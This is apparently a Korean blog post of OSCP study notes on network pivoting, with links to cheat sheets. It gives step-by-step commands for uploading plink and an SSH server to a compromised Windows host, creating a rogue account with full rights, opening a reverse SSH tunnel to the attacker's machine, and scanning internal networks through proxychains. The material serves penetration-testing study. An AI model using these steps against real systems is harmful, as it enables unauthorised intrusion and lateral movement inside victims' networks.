방대한 피봇 프로그램 사용법 가이드
https://artkond.com/2017/03/23/pivoting-guide/#rpivot
SSH서버, proxychains, 메타스플로잇 Pivot, 더블 pivot
https://pentest.blog/explore-hidden-networks-with-double-pivoting/
putty 프록시 설정
http://blog.daum.net/99445015/232
리눅스 SSH Server(SOCK Proxy) 생성, 웹브라우저 설정
https://ma.ttias.be/socks-proxy-linux-ssh-bypass-content-filters/
OCSP 포트포워딩, 터널링 치트시트
https://xapax.gitbooks.io/security/content/port_forwarding_and_tunneling.html
https://www.offensive-security.com/metasploit-unleashed/pivoting/
https://www.sans.org/reading-room/whitepapers/testing/paper/36117
https://nullsweep.com/pivot-cheatsheet-for-pentesters/
https://hkashfi.blogspot.com/2008/04/bypassing-firewalls-with-port_23.html
오늘 공부한 Pivoting 정리
1. windows 익스플로잇 후
2. plink.exe, bitvise 서버 설치파일 업로드
3. victim에 SSH서버가 없는 경우 bitvise 서버 설치
4. virtual 계정생성,비번 설정,모든 권한 부여
5. victim에서 리버스 쉘 생성
plink.exe -N -R 2222:127.0.0.1:22 root@10.11.0.33
- 확인: netstat -antp
6. 공격자 pc에 Dynamic포트 오픈, victim포트와 연결
ssh -f -N -D 127.0.0.1:8080 -p 2222 test@127.0.0.1
- 이부분이 가장 헷갈렸는데 리버스 쉘 생성으로 인해 remote 호스트와 포트 지정으로 127.0.0.1:2222이 가능함
- test 계정은 vicitm에서 생성한 ssh virtual 계정.
- 리버스 쉘로 victim과 이미 연결된 상태(2222)인데 8080 동적 포트를 생성하여 victim에 포워딩 할 것임 ,
이제 127.0.0.1:8080으로 연결할 수 있다면 다양한 툴을 사용할 수 있음
*ProxyChain
/etc/proxychains.config에 아이피,포트 설정 후 proxychains 프로그램을 사용해 Kali 툴 사용 가능
- socks4 127.0.0.1 8080
- proxychains [프로그램]
- nmap 스캔시 -sT, -Pn 옵션 붙여줄 것.
* 웹 브라우저
브라우저를 통해 웹을 탐색할 경우 연결해 프록시 네트워크 설정 후 NAT 웹서버 접속
127.0.0.1 8080
*SSH에서 생성된 프록시 서버는 socks4이므로 socks4 옵션을 선택해야 한다.
* SSH 옵션 설명
Dynamic(동적)포트 포워딩을 생성한 세션에서는 어떤 명령어도 실행되서는 안된다.
이를 방지하기 위해 f옵션과 N옵션을 같이 사용한다.
-f: ssh에게 명령 실행 직전에 백그라운드로 이동하도록 요청합니다. 이것은 ssh가 비밀번호나 비밀번호 문구를 요구할 때 유용하지만 사용자는 백그라운드에서 비밀번호를 원합니다. 이것은 -n을 암시합니다.
-N: Do not execute a remote command. This is useful for just forwarding ports
(-N 옵션 사용하면 원격에 접속에 성공해도 쉘이 안뜬채로 실행됨)
예전 공부자료
침투된 컴퓨터와 연결된 내부 네트워크 스캔을 위해......proxychain이 필요할 듯...
RDP 후 nmap 설치보다 가능성 있어보임..속도는 victim에 nmap 설치시킬 수 만 있으면 nmap 쓰는게 더 빠르다..
plink는 putty의 console버전
결국, 타겟머신에 SSH서버가 실행되어야 피봇팅 할 수 있네...
ssh서버 없으면 bitwise 설치
https://github.com/codingo/OSCP-2/tree/master/Documents
Reverse SSH Portforwarding:
Note that if you use OpenSSH sshd server, the server’s GatewayPorts option needs to be enabled (set to yes or clientspecified – GatewayPorts yes) for this to work (check file /etc/ssh/sshd_config on the server). Otherwise (default value for this option is no), the server will always force port bound on the loopback interface only.
https://www.reddit.com/r/oscp/comments/cjnzu2/pivoting/
ssh -D 1080 root@<box1iphere>
add SOCKS5 127.0.0.1 1080 to /etc/proxychains.conf
Use proxychains nmap -sT to scan
Issue any further proxied commands, prepending 'proxychains' to the command you'd like to run.
Other options are using Meterpreter's Autoroute or sshuttle. Note that with ProxyChains, it's going to be ideal to adjust your TCP window timeouts in /etc/proxychains.conf or you will be waiting a very long time indeed for a scan to complete.
'OSCP > 도구 개념 정리' 카테고리의 다른 글
Exploiting wildcards on Linux - 권한상승 (0) | 2020.04.24 |
---|---|
Meterpreter (0) | 2020.04.13 |
Systemctl (0) | 2020.04.13 |
Nmap, Gobuster, JohnTheRipper (0) | 2020.04.13 |
VIM 명령어 별도 정리 (0) | 2020.02.05 |